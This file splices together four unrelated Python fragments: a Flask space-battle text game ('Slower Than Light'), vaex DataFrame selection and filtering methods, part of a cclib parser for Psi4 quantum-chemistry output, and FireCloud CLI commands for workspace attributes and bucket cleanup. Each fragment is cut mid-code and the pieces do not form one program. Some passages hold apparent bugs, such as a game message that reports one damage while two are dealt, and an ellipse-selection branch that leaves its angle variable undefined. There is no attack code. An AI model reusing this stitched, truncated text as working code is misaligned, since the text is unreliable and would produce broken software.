2 : {' NEXT ' : '3', ' BACK ' : '1'},
3 : {' NEXT ' : '7', ' BACK ' : '2'},
4 : {' UP ' : '5', ' DOWN ' : '6', ' BACK ' : '1'},
5 : {' NEXT ' : '7', ' BACK ' : '4'},
6 : {' NEXT ' : '8', ' BACK ' : '4'},
7 : {' NEXT ' : '9', ' BACK TOP ' : '3', ' BACK BOT ' : '5'},
8 : {' NEXT ' : '9', ' BACK ' : '6'},
9 : {' NEXT ' : '10', ' BACK TOP ' : '7', ' BACK BOT ' : '8'},
10 : {' END ' : '10'}}
done = {2 : False, 3 : False, 4 : False, 5 : False, 6 : False, 7 : False, 8 : False, 9 : False}
CLOSEPOPPUP = 'javascript:void(document.getElementById("message").style.display="none");'
def renderGame(title, content, options):
return render_template('game/game.html', title=title, location=location, symbol='*', health=health, power=power//2, destinations=travel[location],weapons=weapons , money=money, content=content, options=options)
def incrementCooldown():
global power
global stopped
for key in weapons:
if (weapons[key] > 0):
weapons[key] = weapons[key] - 1
for key in enemy['weapons']:
if (enemy['weapons'][key] > 0):
enemy['weapons'][key] = enemy['weapons'][key] - 1
if (power < 20):
power = power + 1
if (stopped > 0):
stopped = stopped - 1
if (enemy['stopped'] > 0):
enemy['stopped'] = enemy['stopped'] - 1
def initBattle(enabled):
if (enabled == True):
for key in weapons:
if (key == 'missile'):
weapons[key] = 2
if (key == 'burst'):
weapons[key] = 1
if (key == 'ion'):
weapons[key] = 3
if (key == 'flak'):
weapons[key] = 9
else:
for key in weapons:
weapons[key] = -1
def battle(action):
global health
global state
global stopped
global location
global money
text = ''
title = ''
options = {'Close' : CLOSEPOPPUP}
if (stopped == 0):
if (action == 'missile'):
text = text + 'Your pegasus missile landed and dealt two damage to the enemy hull. '
enemy['health'] = enemy['health'] - 2
weapons['missile'] = 2
if (action == 'burst'):
random = randint(0, 3)
text = text + 'Your burst lasers dealt ' + {0:'zero',1:'one',2:'two',3:'three'}[random] + ' damage to the enemy hull. '
enemy['health'] = enemy['health'] - random
weapons['burst'] = 1
if (action == 'ion'):
random = randint(1, 3)
if (random > 1):
text = text + 'Your heavy ion blaster hit and disabled the enemy for a bit. '
enemy['stopped'] = random
else:
text = text + 'Your heavy ion blaster missed. '
weapons['ion'] = 3
if (action == 'flak'):
random = randint(1, 2)
text = text + 'Your flak gun dealt ' + {1:'seven',2:'fourteen'}[random] + ' damage to the enemy hull. '
enemy['health'] = enemy['health'] - (7 * random)
weapons['flak'] = 9
else:
text = text + 'You are still disabled from the enemy ion blast. '
if (enemy['stopped'] == 0):
if (enemy['weapons']['missile'] == 0 and randint(0,1) == 1):
text = text + 'The enemy pegasus missile landed and dealt one damage to your hull. '
enemy['weapons']['missile'] = 3
health = health - 2
elif (enemy['weapons']['burst'] == 0 and randint(0,1) == 1):
random = randint(0, 2)
text = text + 'The enemy lasers dealt ' + {0:'zero',1:'one',2:'two'}[random] + ' damage to your hull. '
health = health - random
enemy['weapons']['burst'] = 2
elif (enemy['weapons']['ion'] == 0 and randint(0,1) == 1):
random = randint(0, 2)
if (random > 0):
text = text + 'The enemy heavy ion blaster hit and disabled the you for a bit. '
else:
text = text + 'The enemy heavy ion blaster fired, but missed. '
stopped = random
enemy['weapons']['ion'] = 4
elif (enemy['weapons']['flak'] == 0 and randint(0,1) == 1):
random = randint(1, 2)
text = text + 'The enemy flak gun dealt ' + {1:'four',2:'eight'}[random] + ' damage to your hull. '
health = health - (4 * random)
enemy['weapons']['missile'] = 10
else:
text = text + 'The enemy is still disabled from the ion blast. '
if (enemy['health'] < 1):
state = 2
done[location] = True
money = money + enemy['reward']
return renderGame(title, text, options)
def read():
global power
global state
global enemy
global health
global money
if (location == 1):
initBattle(False)
power = 20
title = 'Slower Than Light!'
content = 'You load into a game that seems strangely familiar to <a href="https://www.gog.com/game/faster_than_light">another game</a> but you quickly realise that that would be silly, because no one would rip-off <a href="http://store.steampowered.com/app/212680/FTL_Faster_Than_Light/">another game</a> so shamelessly without attribution. If there was a fantastic <a href="https://itunes.apple.com/us/app/ftl-faster-than-light/id833951143?mt=8">indie game</a> like this, (which there <a href="https://www.humblebundle.com/store/ftl-faster-than-light">totally isn\'t</a>) it would definitely be more interesting than this anyways. This web game, which looks quite similar to the authors previous works, throws you directly into the action by telling you that you are piloting a ship with critical information gathered by spies that would help the resistance a lot. With the Galactic Federation hot on your tail, you must reach home-base quickly. Jump to the next point.'
options = {'Embark' : CLOSEPOPPUP}
return renderGame(title, content, options)
elif (location == 2):
if (state == 2):
initBattle(False)
power = 20
title = 'Victory! | Slower Than Light!'
content = 'Your final shot flies into the drone. A small puff of gas shoots out of its exhaust before the drone explodes into a massive cloud of metal and gas. You grab $20 out of the wreckage. This sector should be clear. Our journey has only just started and we have many more trials ahead of us.'
options = {'Close' : CLOSEPOPPUP}
return renderGame(title, content, options)
elif (state == 3):
initBattle(False)
power = 20
title = 'Sector 2 | Slower Than Light!'
content = 'The sector is completely empty. No life can be found. Some of the debris from the scout is still floating around.'
options = {'Close' : CLOSEPOPPUP}
return renderGame(title, content, options)
else:
initBattle(True)
power = 0
enemy = {'health' : 10, 'stopped' : 0, 'weapons' : {'missile' : 3, 'burst' : 2, 'ion' : -1, 'flak' : -1}, 'reward' : 20}
title = 'Scout Drone | Slower Than Light!'
content = 'After that confusing introduction and totally not cliche "start with forked paths" deal out of the way, you scan around the system you just juped too. Your scanners quickly notice a Federation drone scout about three AU away. You can\'t let the Federation find you. Destroy that ship.'
options = {'Ready the Guns!' : '?action=pass'}
state = 1
return renderGame(title, content, options)
elif (location == 3):
if (state == 2):
initBattle(False)
power = 20
title = 'Victory! | Slower Than Light!'
content = 'The hull to the fighter suddenly rips open and the ship implodes on itself. You feel tempted to search the wreckage for any intel or weapons, but out of fear for more ships warping in, you grab $15 and get going.'
options = {'Close' : CLOSEPOPPUP}
return renderGame(title, content, options)
elif (state == 3):
initBattle(False)
power = 20
title = 'Sector 3 | Slower Than Light!'
content = 'The sector remains quiet. You hurry past the planet that the fighter warped to out of fear than more might be coming.'
options = {'Close' : CLOSEPOPPUP}
return renderGame(title, content, options)
else:
initBattle(True)
power = 0
enemy = {'health' : 8, 'stopped' : 0, 'weapons' : {'missile' : 2, 'burst' : 1, 'ion' : 3, 'flak' : -1}, 'reward' : 15}
title = 'Federation Fighter | Slower Than Light!'
| |
:param str boolean_expression: Any valid column expression, with comparison operators
:param str mode: Possible boolean operator: replace/and/or/xor/subtract
:param str name: history tree or selection 'slot' to use
:param executor:
:return:
"""
boolean_expression = _ensure_string_from_expression(boolean_expression)
if boolean_expression is None and not self.has_selection(name=name):
pass # we don't want to pollute the history with many None selections
self.signal_selection_changed.emit(self, name) # TODO: unittest want to know, does this make sense?
else:
def create(current):
return selections.SelectionExpression(boolean_expression, current, mode) if boolean_expression else None
self._selection(create, name)
def select_non_missing(self, drop_nan=True, drop_masked=True, column_names=None, mode="replace", name="default"):
"""Create a selection that selects rows having non missing values for all columns in column_names.
The name reflects Pandas, no rows are really dropped, but a mask is kept to keep track of the selection
:param drop_nan: drop rows when there is a NaN in any of the columns (will only affect float values)
:param drop_masked: drop rows when there is a masked value in any of the columns
:param column_names: The columns to consider, default: all (real, non-virtual) columns
:param str mode: Possible boolean operator: replace/and/or/xor/subtract
:param str name: history tree or selection 'slot' to use
:return:
"""
column_names = column_names or self.get_column_names(virtual=False)
def create(current):
return selections.SelectionDropNa(drop_nan, drop_masked, column_names, current, mode)
self._selection(create, name)
def dropmissing(self, column_names=None):
"""Create a shallow copy of a DataFrame, with filtering set using ismissing.
:param column_names: The columns to consider, default: all (real, non-virtual) columns
:rtype: DataFrame
"""
return self._filter_all(self.func.ismissing, column_names)
def dropnan(self, column_names=None):
"""Create a shallow copy of a DataFrame, with filtering set using isnan.
:param column_names: The columns to consider, default: all (real, non-virtual) columns
:rtype: DataFrame
"""
return self._filter_all(self.func.isnan, column_names)
def dropna(self, column_names=None):
"""Create a shallow copy of a DataFrame, with filtering set using isna.
:param column_names: The columns to consider, default: all (real, non-virtual) columns
:rtype: DataFrame
"""
return self._filter_all(self.func.isna, column_names)
def dropinf(self, column_names=None):
""" Create a shallow copy of a DataFrame, with filtering set using isinf.
:param column_names: The columns to consider, default: all (real, non-virtual) columns
:rtype: DataFrame
"""
return self._filter_all(self.func.isinf, column_names)
def _filter_all(self, f, column_names=None):
column_names = column_names or self.get_column_names(virtual=False)
expression = f(self[column_names[0]])
for column in column_names[1:]:
expression = expression | f(self[column])
return self.filter(~expression, mode='and')
def select_nothing(self, name="default"):
"""Select nothing."""
logger.debug("selecting nothing")
self.select(None, name=name)
self.signal_selection_changed.emit(self, name)
def select_rectangle(self, x, y, limits, mode="replace", name="default"):
"""Select a 2d rectangular box in the space given by x and y, bounded by limits.
Example:
>>> df.select_box('x', 'y', [(0, 10), (0, 1)])
:param x: expression for the x space
:param y: expression fo the y space
:param limits: sequence of shape [(x1, x2), (y1, y2)]
:param mode:
"""
self.select_box([x, y], limits, mode=mode, name=name)
def select_box(self, spaces, limits, mode="replace", name="default"):
"""Select a n-dimensional rectangular box bounded by limits.
The following examples are equivalent:
>>> df.select_box(['x', 'y'], [(0, 10), (0, 1)])
>>> df.select_rectangle('x', 'y', [(0, 10), (0, 1)])
:param spaces: list of expressions
:param limits: sequence of shape [(x1, x2), (y1, y2)]
:param mode:
:param name:
:return:
"""
sorted_limits = [(min(l), max(l)) for l in limits]
expressions = ["((%s) >= %f) & ((%s) <= %f)" % (expression, lmin, expression, lmax) for
(expression, (lmin, lmax)) in zip(spaces, sorted_limits)]
self.select("&".join(expressions), mode=mode, name=name)
def select_circle(self, x, y, xc, yc, r, mode="replace", name="default", inclusive=True):
"""
Select a circular region centred on xc, yc, with a radius of r.
Example:
>>> df.select_circle('x','y',2,3,1)
:param x: expression for the x space
:param y: expression for the y space
:param xc: location of the centre of the circle in x
:param yc: location of the centre of the circle in y
:param r: the radius of the circle
:param name: name of the selection
:param mode:
:return:
"""
# expr = "({x}-{xc})**2 + ({y}-{yc})**2 <={r}**2".format(**locals())
if inclusive:
expr = (self[x] - xc)**2 + (self[y] - yc)**2 <= r**2
else:
expr = (self[x] - xc)**2 + (self[y] - yc)**2 < r**2
self.select(boolean_expression=expr, mode=mode, name=name)
def select_ellipse(self, x, y, xc, yc, width, height, angle=0, mode="replace", name="default", radians=False, inclusive=True):
"""
Select an elliptical region centred on xc, yc, with a certain width, height
and angle.
Example:
>>> df.select_ellipse('x','y', 2, -1, 5,1, 30, name='my_ellipse')
:param x: expression for the x space
:param y: expression for the y space
:param xc: location of the centre of the ellipse in x
:param yc: location of the centre of the ellipse in y
:param width: the width of the ellipse (diameter)
:param height: the width of the ellipse (diameter)
:param angle: (degrees) orientation of the ellipse, counter-clockwise
measured from the y axis
:param name: name of the selection
:param mode:
:return:
"""
# Computing the properties of the ellipse prior to selection
if radians:
pass
else:
alpha = np.deg2rad(angle)
xr = width / 2
yr = height / 2
r = max(xr, yr)
a = xr / r
b = yr / r
expr = "(({x}-{xc})*cos({alpha})+({y}-{yc})*sin({alpha}))**2/{a}**2 + (({x}-{xc})*sin({alpha})-({y}-{yc})*cos({alpha}))**2/{b}**2 <= {r}**2".format(**locals())
if inclusive:
expr = ((self[x] - xc) * np.cos(alpha) + (self[y] - yc) * np.sin(alpha))**2 / a**2 + ((self[x] - xc) * np.sin(alpha) - (self[y] - yc) * np.cos(alpha))**2 / b**2 <= r**2
else:
expr = ((self[x] - xc) * np.cos(alpha) + (self[y] - yc) * np.sin(alpha))**2 / a**2 + ((self[x] - xc) * np.sin(alpha) - (self[y] - yc) * np.cos(alpha))**2 / b**2 < r**2
self.select(boolean_expression=expr, mode=mode, name=name)
def select_lasso(self, expression_x, expression_y, xsequence, ysequence, mode="replace", name="default", executor=None):
"""For performance reasons, a lasso selection is handled differently.
:param str expression_x: Name/expression for the x coordinate
:param str expression_y: Name/expression for the y coordinate
:param xsequence: list of x numbers defining the lasso, together with y
:param ysequence:
:param str mode: Possible boolean operator: replace/and/or/xor/subtract
:param str name:
:param executor:
:return:
"""
def create(current):
return selections.SelectionLasso(expression_x, expression_y, xsequence, ysequence, current, mode)
self._selection(create, name, executor=executor)
def select_inverse(self, name="default", executor=None):
"""Invert the selection, i.e. what is selected will not be, and vice versa
:param str name:
:param executor:
:return:
"""
def create(current):
return selections.SelectionInvert(current)
self._selection(create, name, executor=executor)
def set_selection(self, selection, name="default", executor=None):
"""Sets the selection object
:param selection: Selection object
:param name: selection 'slot'
:param executor:
:return:
"""
def create(current):
return selection
self._selection(create, name, executor=executor, execute_fully=True)
def _selection(self, create_selection, name, executor=None, execute_fully=False):
"""select_lasso and select almost share the same code"""
selection_history = self.selection_histories[name]
previous_index = self.selection_history_indices[name]
current = selection_history[previous_index] if selection_history else None
selection = create_selection(current)
executor = executor or self.executor
selection_history.append(selection)
self.selection_history_indices[name] += 1
# clip any redo history
del selection_history[self.selection_history_indices[name]:-1]
self.signal_selection_changed.emit(self, name)
result = vaex.promise.Promise.fulfilled(None)
# logger.debug("select selection history is %r, index is %r", selection_history, self.selection_history_indices[name])
return result
def has_selection(self, name="default"):
"""Returns True if there is a selection with the given name."""
return self.get_selection(name) is not None
def __setitem__(self, name, value):
'''Convenient way to add a virtual column / expression to this DataFrame.
Example:
>>> import vaex, numpy as np
>>> df = vaex.example()
>>> df['r'] = np.sqrt(df.x**2 + df.y**2 + df.z**2)
>>> df.r
<vaex.expression.Expression(expressions='r')> instance at 0x121687e80 values=[2.9655450396553587, 5.77829281049018, 6.99079603950256, 9.431842752707537, 0.8825613121347967 ... (total 330000 values) ... 7.453831761514681, 15.398412491068198, 8.864250273925633, 17.601047186042507, 14.540181524970293]
'''
if isinstance(name, six.string_types):
if isinstance(value, supported_column_types):
self.add_column(name, value)
else:
self.add_virtual_column(name, value)
else:
raise TypeError('__setitem__ only takes strings as arguments, not {}'.format(type(name)))
def drop_filter(self, inplace=False):
"""Removes all filters from the DataFrame"""
df = self if inplace else self.copy()
df.select_nothing(name=FILTER_SELECTION_NAME)
df._invalidate_caches()
return df
def filter(self, expression, mode="and"):
"""General version of df[<boolean expression>] to modify the filter applied to the DataFrame.
See :func:`DataFrame.select` for usage of selection.
Note that using `df = df[<boolean expression>]`, one can only narrow the filter (i.e. only less rows
can be selected). Using the filter method, and a different boolean mode (e.g. "or") one can actually
cause more rows to be selected. This differs greatly from numpy and pandas for instance, which can only
narrow the filter.
Example:
>>> import vaex
>>> import numpy as np
>>> x = np.arange(10)
>>> df = vaex.from_arrays(x=x, y=x**2)
>>> df
# x y
0 0 0
1 1 1
2 2 4
3 | |
i in indices.split()]
if len(mocoeffs) < indices[-1]:
for i in range(len(indices)):
mocoeffs.append([])
else:
assert len(mocoeffs) == indices[-1]
self.skip_line(inputfile, 'blank')
n = len(indices)
line = next(inputfile)
while line.strip():
chomp = line.split()
m = len(chomp)
iao = int(chomp[0])
coeffs = [float(c) for c in chomp[m - n:]]
for i, c in enumerate(coeffs):
mocoeffs[indices[i]-1].append(c)
line = next(inputfile)
energies = next(inputfile)
symmetries = next(inputfile)
occupancies = next(inputfile)
self.skip_lines(inputfile, ['b', 'b'])
indices = next(inputfile)
if not hasattr(self, 'mocoeffs'):
self.mocoeffs = []
self.mocoeffs.append(mocoeffs)
# The formats for Mulliken and Lowdin atomic charges are the same, just with
# the name changes, so use the same code for both.
#
# Properties computed using the SCF density density matrix
# Mulliken Charges: (a.u.)
# Center Symbol Alpha Beta Spin Total
# 1 C 2.99909 2.99909 0.00000 0.00182
# 2 C 2.99909 2.99909 0.00000 0.00182
# ...
for pop_type in ["Mulliken", "Lowdin"]:
if line.strip() == "%s Charges: (a.u.)" % pop_type:
if not hasattr(self, 'atomcharges'):
self.atomcharges = {}
header = next(inputfile)
line = next(inputfile)
while not line.strip():
line = next(inputfile)
charges = []
while line.strip():
ch = float(line.split()[-1])
charges.append(ch)
line = next(inputfile)
self.atomcharges[pop_type.lower()] = charges
# This is for the older conventional MP2 code in 4.0b5.
mp_trigger = "MP2 Total Energy (a.u.)"
if line.strip()[:len(mp_trigger)] == mp_trigger:
self.metadata["methods"].append("MP2")
mpenergy = utils.convertor(float(line.split()[-1]), 'hartree', 'eV')
if not hasattr(self, 'mpenergies'):
self.mpenergies = []
self.mpenergies.append([mpenergy])
# This is for the newer DF-MP2 code in 4.0.
if 'DF-MP2 Energies' in line:
self.metadata["methods"].append("DF-MP2")
while 'Total Energy' not in line:
line = next(inputfile)
mpenergy = utils.convertor(float(line.split()[3]), 'hartree', 'eV')
if not hasattr(self, 'mpenergies'):
self.mpenergies = []
self.mpenergies.append([mpenergy])
# Note this is just a start and needs to be modified for CCSD(T), etc.
ccsd_trigger = "* CCSD total energy"
if line.strip()[:len(ccsd_trigger)] == ccsd_trigger:
self.metadata["methods"].append("CCSD")
ccsd_energy = utils.convertor(float(line.split()[-1]), 'hartree', 'eV')
if not hasattr(self, "ccenergis"):
self.ccenergies = []
self.ccenergies.append(ccsd_energy)
# The geometry convergence targets and values are printed in a table, with the legends
# describing the convergence annotation. Probably exact slicing of the line needs
# to be done in order to extract the numbers correctly. If there are no values for
# a paritcular target it means they are not used (marked also with an 'o'), and in this case
# we will set a value of numpy.inf so that any value will be smaller.
#
# ==> Convergence Check <==
#
# Measures of convergence in internal coordinates in au.
# Criteria marked as inactive (o), active & met (*), and active & unmet ( ).
# ---------------------------------------------------------------------------------------------
# Step Total Energy Delta E MAX Force RMS Force MAX Disp RMS Disp
# ---------------------------------------------------------------------------------------------
# Convergence Criteria 1.00e-06 * 3.00e-04 * o 1.20e-03 * o
# ---------------------------------------------------------------------------------------------
# 2 -379.77675264 -7.79e-03 1.88e-02 4.37e-03 o 2.29e-02 6.76e-03 o ~
# ---------------------------------------------------------------------------------------------
#
if (self.section == "Convergence Check") and line.strip() == "==> Convergence Check <==" \
and not hasattr(self, 'finite_difference'):
if not hasattr(self, "optstatus"):
self.optstatus = []
self.optstatus.append(data.ccData.OPT_UNKNOWN)
self.skip_lines(inputfile, ['b', 'units', 'comment', 'dash+tilde', 'header', 'dash+tilde'])
# These are the position in the line at which numbers should start.
starts = [27, 41, 55, 69, 83]
criteria = next(inputfile)
geotargets = []
for istart in starts:
if criteria[istart:istart+9].strip():
geotargets.append(float(criteria[istart:istart+9]))
else:
geotargets.append(numpy.inf)
self.skip_line(inputfile, 'dashes')
values = next(inputfile)
step = int(values.split()[0])
geovalues = []
for istart in starts:
if values[istart:istart+9].strip():
geovalues.append(float(values[istart:istart+9]))
if step == 1:
self.optstatus[-1] += data.ccData.OPT_NEW
# This assertion may be too restrictive, but we haven't seen the geotargets change.
# If such an example comes up, update the value since we're interested in the last ones.
if not hasattr(self, 'geotargets'):
self.geotargets = geotargets
else:
assert self.geotargets == geotargets
if not hasattr(self, 'geovalues'):
self.geovalues = []
self.geovalues.append(geovalues)
# This message signals a converged optimization, in which case we want
# to append the index for this step to optdone, which should be equal
# to the number of geovalues gathered so far.
if "Optimization is complete!" in line:
# This is a workaround for Psi4.0/sample_opt-irc-2.out;
# IRC calculations currently aren't parsed properly for
# optimization parameters.
if hasattr(self, 'geovalues'):
if not hasattr(self, 'optdone'):
self.optdone = []
self.optdone.append(len(self.geovalues))
assert hasattr(self, "optstatus") and len(self.optstatus) > 0
self.optstatus[-1] += data.ccData.OPT_DONE
# This message means that optimization has stopped for some reason, but we
# still want optdone to exist in this case, although it will be an empty list.
if line.strip() == "Optimizer: Did not converge!":
if not hasattr(self, 'optdone'):
self.optdone = []
assert hasattr(self, "optstatus") and len(self.optstatus) > 0
self.optstatus[-1] += data.ccData.OPT_UNCONVERGED
# The reference point at which properties are evaluated in Psi4 is explicitely stated,
# so we can save it for later. It is not, however, a part of the Properties section,
# but it appears before it and also in other places where properies that might depend
# on it are printed.
#
# Properties will be evaluated at 0.000000, 0.000000, 0.000000 Bohr
#
# OR
#
# Properties will be evaluated at 0.000000, 0.000000, 0.000000 [a0]
#
if "Properties will be evaluated at" in line.strip():
self.origin = numpy.array([float(x.strip(',')) for x in line.split()[-4:-1]])
assert line.split()[-1] in ["Bohr", "[a0]"]
self.origin = utils.convertor(self.origin, 'bohr', 'Angstrom')
# The properties section print the molecular dipole moment:
#
# ==> Properties <==
#
#
#Properties computed using the SCF density density matrix
# Nuclear Dipole Moment: (a.u.)
# X: 0.0000 Y: 0.0000 Z: 0.0000
#
# Electronic Dipole Moment: (a.u.)
# X: 0.0000 Y: 0.0000 Z: 0.0000
#
# Dipole Moment: (a.u.)
# X: 0.0000 Y: 0.0000 Z: 0.0000 Total: 0.0000
#
if (self.section == "Properties") and line.strip() == "Dipole Moment: (a.u.)":
line = next(inputfile)
dipole = numpy.array([float(line.split()[1]), float(line.split()[3]), float(line.split()[5])])
dipole = utils.convertor(dipole, "ebohr", "Debye")
if not hasattr(self, 'moments'):
# Old versions of Psi4 don't print the origin; assume
# it's at zero.
if not hasattr(self, 'origin'):
self.origin = numpy.array([0.0, 0.0, 0.0])
self.moments = [self.origin, dipole]
else:
try:
assert numpy.all(self.moments[1] == dipole)
except AssertionError:
self.logger.warning('Overwriting previous multipole moments with new values')
self.logger.warning('This could be from post-HF properties or geometry optimization')
self.moments = [self.origin, dipole]
# Higher multipole moments are printed separately, on demand, in lexicographical order.
#
# Multipole Moments:
#
# ------------------------------------------------------------------------------------
# Multipole Electric (a.u.) Nuclear (a.u.) Total (a.u.)
# ------------------------------------------------------------------------------------
#
# L = 1. Multiply by 2.5417462300 to convert to Debye
# Dipole X : 0.0000000 0.0000000 0.0000000
# Dipole Y : 0.0000000 0.0000000 0.0000000
# Dipole Z : 0.0000000 0.0000000 0.0000000
#
# L = 2. Multiply by 1.3450341749 to convert to Debye.ang
# Quadrupole XX : -1535.8888701 1496.8839996 -39.0048704
# Quadrupole XY : -11.5262958 11.4580038 -0.0682920
# ...
#
if line.strip() == "Multipole Moments:":
self.skip_lines(inputfile, ['b', 'd', 'header', 'd', 'b'])
# The reference used here should have been printed somewhere
# before the properties and parsed above.
moments = [self.origin]
line = next(inputfile)
while "----------" not in line.strip():
rank = int(line.split()[2].strip('.'))
multipole = []
line = next(inputfile)
while line.strip():
value = float(line.split()[-1])
fromunits = "ebohr" + (rank > 1)*("%i" % rank)
tounits = "Debye" + (rank > 1)*".ang" + (rank > 2)*("%i" % (rank-1))
value = utils.convertor(value, fromunits, tounits)
multipole.append(value)
line = next(inputfile)
multipole = numpy.array(multipole)
moments.append(multipole)
line = next(inputfile)
if not hasattr(self, 'moments'):
self.moments = moments
else:
for im, m in enumerate(moments):
if len(self.moments) <= im:
self.moments.append(m)
else:
assert numpy.allclose(self.moments[im], m, atol=1.0e4)
## Analytic Gradient
# -Total Gradient:
# Atom X Y Z
# ------ ----------------- ----------------- -----------------
# 1 -0.000000000000 0.000000000000 -0.064527252292
# 2 0.000000000000 -0.028380539652 0.032263626146
# 3 -0.000000000000 0.028380539652 0.032263626146
## Finite Differences Gradient
# -------------------------------------------------------------
# ## F-D gradient (Symmetry 0) ##
# Irrep: 1 Size: 3 x 3
#
# 1 2 3
#
# 1 0.00000000000000 0.00000000000000 -0.02921303282515
# 2 0.00000000000000 -0.00979709321487 0.01460651641258
# 3 0.00000000000000 0.00979709321487 0.01460651641258
if line.strip() in Psi4.GRADIENT_HEADERS:
# Handle the different header lines between analytic and
# numerical gradients.
gradient_skip_lines = [
info.skip_lines
for info in Psi4.GRADIENT_TYPES.values()
| |
else:
message = "WARNING: this will delete the following attributes in " + \
"{0}/{1}\n\t".format(args.project, args.workspace) + \
"\n\t".join(args.attributes)
if not (args.yes or _confirm_prompt(message)):
return 0
updates = [fapi._attr_rem(a) for a in args.attributes]
r = fapi.update_workspace_attributes(args.project, args.workspace,
updates)
fapi._check_response_code(r, 200)
return 0
@fiss_cmd
def attr_copy(args):
""" Copy workspace attributes between workspaces. """
if not args.to_workspace:
args.to_workspace = args.workspace
if not args.to_project:
args.to_project = args.project
if (args.project == args.to_project
and args.workspace == args.to_workspace):
eprint("destination project and namespace must differ from"
" source workspace")
return 1
# First get the workspace attributes of the source workspace
r = fapi.get_workspace(args.project, args.workspace, fields="workspace.attributes")
fapi._check_response_code(r, 200)
# Parse the attributes
workspace_attrs = r.json()['workspace']['attributes']
# If we passed attributes, only use those
if args.attributes:
workspace_attrs = {k:v for k, v in iteritems(workspace_attrs)
if k in args.attributes}
if len(workspace_attrs) == 0:
print("No workspace attributes defined in {0}/{1}".format(
args.project, args.workspace))
return 1
message = "This will copy the following workspace attributes to {0}/{1}\n"
message = message.format(args.to_project, args.to_workspace)
for k, v in sorted(iteritems(workspace_attrs)):
message += '\t{0}\t{1}\n'.format(k, v)
if not args.yes and not _confirm_prompt(message):
return 0
# make the attributes into updates
updates = [fapi._attr_set(k,v) for k,v in iteritems(workspace_attrs)]
r = fapi.update_workspace_attributes(args.to_project, args.to_workspace,
updates)
fapi._check_response_code(r, 200)
return 0
@fiss_cmd
def attr_fill_null(args):
"""
Assign the null sentinel value for all entities which do not have a value
for the given attributes.
see gs://broad-institute-gdac/GDAC_FC_NULL for more details
"""
NULL_SENTINEL = "gs://broad-institute-gdac/GDAC_FC_NULL"
attrs = args.attributes
if not attrs:
print("Error: provide at least one attribute to set")
return 1
if 'participant' in attrs or 'samples' in attrs:
print("Error: can't assign null to samples or participant")
return 1
# Set entity attributes
if args.entity_type is not None:
print("Collecting entity data...")
# Get existing attributes
entities = _entity_paginator(args.project, args.workspace,
args.entity_type,
page_size=1000, filter_terms=None,
sort_direction="asc")
# samples need participant_id as well
#TODO: This may need more fixing for other types
orig_attrs = list(attrs)
if args.entity_type == "sample":
attrs.insert(0, "participant_id")
header = "entity:" + args.entity_type + "_id\t" + "\t".join(attrs)
# Book keep the number of updates for each attribute
attr_update_counts = {a : 0 for a in orig_attrs}
# construct new entity data by inserting null sentinel, and counting
# the number of updates
entity_data = []
for entity_dict in entities:
name = entity_dict['name']
etype = entity_dict['entityType']
e_attrs = entity_dict['attributes']
line = name
altered = False
for attr in attrs:
if attr == "participant_id":
line += "\t" + e_attrs['participant']['entityName']
continue # This attribute is never updated by fill_null
if attr not in e_attrs:
altered = True
attr_update_counts[attr] += 1
line += "\t" + str(e_attrs.get(attr, NULL_SENTINEL))
# Improve performance by only updating records that have changed
if altered:
entity_data.append(line)
# Check to see if all entities are being set to null for any attributes
# This is usually a mistake, so warn the user
num_entities = len(entities)
prompt = "Continue? [Y\\n]: "
for attr in orig_attrs:
if num_entities == attr_update_counts[attr]:
message = "WARNING: no {0}s with attribute '{1}'\n".format(
args.entity_type, attr
)
if not args.yes and not _confirm_prompt(message, prompt):
return
# check to see if no sentinels are necessary
if not any(c != 0 for c in itervalues(attr_update_counts)):
print("No null sentinels required, exiting...")
return 0
if args.to_loadfile:
print("Saving loadfile to " + args.to_loadfile)
with open(args.to_loadfile, "w") as f:
f.write(header + '\n')
f.write("\n".join(entity_data))
return 0
updates_table = " count attribute\n"
for attr in sorted(attr_update_counts):
count = attr_update_counts[attr]
updates_table += "{0:>10} {1}\n".format(count, attr)
message = "WARNING: This will insert null sentinels for " \
"these attributes:\n" + updates_table
if not args.yes and not _confirm_prompt(message):
return 0
# Chunk the entities into batches of 500, and upload to FC
print("Batching " + str(len(entity_data)) + " updates to Firecloud...")
chunk_len = 500
total = int(len(entity_data) / chunk_len) + 1
batch = 0
for i in range(0, len(entity_data), chunk_len):
batch += 1
print("Updating samples {0}-{1}, batch {2}/{3}".format(
i+1, min(i+chunk_len, len(entity_data)), batch, total
))
this_data = header + '\n' + '\n'.join(entity_data[i:i+chunk_len])
# Now push the entity data back to firecloud
r = fapi.upload_entities(args.project, args.workspace, this_data)
fapi._check_response_code(r, 200)
return 0
else:
# TODO: set workspace attributes
print("attr_fill_null requires an entity type")
return 1
@fiss_cmd
def health(args):
""" Health FireCloud Server """
r = fapi.health()
fapi._check_response_code(r, 200)
return r.content
@fiss_cmd
def mop(args):
''' Clean up unreferenced data in a workspace'''
# First retrieve the workspace to get bucket information
if args.verbose:
print("Retrieving workspace information...")
fields = "workspace.bucketName,workspace.name,workspace.attributes"
r = fapi.get_workspace(args.project, args.workspace, fields=fields)
fapi._check_response_code(r, 200)
workspace = r.json()
bucket = workspace['workspace']['bucketName']
bucket_prefix = 'gs://' + bucket
workspace_name = workspace['workspace']['name']
if args.verbose:
print("{} -- {}".format(workspace_name, bucket_prefix))
# Handle Basic Values, Compound data structures, and Nestings thereof
def update_referenced_files(referenced_files, attrs, bucket_prefix):
for attr in attrs:
# 1-D array attributes are dicts with the values stored in 'items'
if isinstance(attr, dict) and attr.get('itemsType') == 'AttributeValue':
update_referenced_files(referenced_files, attr['items'], bucket_prefix)
# Compound data structures resolve to dicts
elif isinstance(attr, dict):
update_referenced_files(referenced_files, attr.values(), bucket_prefix)
# Nested arrays resolve to lists
elif isinstance(attr, list):
update_referenced_files(referenced_files, attr, bucket_prefix)
elif isinstance(attr, string_types) and attr.startswith(bucket_prefix):
referenced_files.add(attr)
referenced_files = set()
update_referenced_files(referenced_files,
workspace['workspace']['attributes'].values(),
bucket_prefix)
# TODO: Make this more efficient with a native api call?
# # Now run a gsutil ls to list files present in the bucket
try:
gsutil_args = ['gsutil', 'ls', '-l', bucket_prefix + '/**']
if args.verbose:
print(' '.join(gsutil_args))
bucket_files = subprocess.check_output(gsutil_args, stderr=subprocess.STDOUT)
# Check output produces a string in Py2, Bytes in Py3, so decode if necessary
if type(bucket_files) == bytes:
bucket_files = bucket_files.decode()
# Store size of each file in bucket to report recovered space
bucket_file_sizes = {}
for listing in bucket_files.split('\n'):
listing = listing.strip().split(' ')
if len(listing) != 3:
break
bucket_file_sizes[listing[2]] = int(listing[0])
# Now make a call to the API for the user's submission information.
